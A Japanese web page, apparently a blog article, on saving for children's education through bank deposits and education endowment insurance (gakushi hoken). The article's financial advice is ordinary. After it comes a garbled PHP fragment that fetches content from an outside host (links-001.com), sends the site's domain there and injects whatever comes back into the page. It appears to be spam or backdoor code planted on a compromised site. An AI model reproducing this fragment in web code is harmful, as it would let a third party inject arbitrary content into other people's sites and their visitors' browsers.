前へ
次へ

教育費用を貯める方法は預金だけではない

子供を小中学校から大学と通わせるためにはまとまった資金が必要です。お子さんが小さいうちから教育の資金を貯蓄しておくことで備えることができます。一般的に思い浮かぶのは銀行口座に預金をすることでしょう。しかし、現在の金利は0.001%となり定期預金でも0.01%が限度で高い金利は望めません。預金ならいつでも引き出せますしどんな用途にでも使えます。ある意味一番負担にならない方法と言えるでしょう。子供の教育資金をためる目的として学資保険が存在します。事前に満期を設定して時期が来たら資金を受け取って教育費を補います。教育費は学校の授業料だけではありません。部活などの学外活動や一人暮らしに必要な住居や家電など様々な出費があります。出費が多く予測される時期に合わせて設定します。満期のタイミングは18歳が一般的ですが、契約月や誕生月によっては受け取りが遅くなることもあります。もし誕生月が遅ければ17歳と早めに設定するのもありです。学資保険はもし契約者に万が一のことが起これば、その後の保険料の支払いが不要になります。そして免除された後も学資保険の保障は続きます。便利な保険ですが途中解約すると一部損をしてしまうので注意しましょう。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top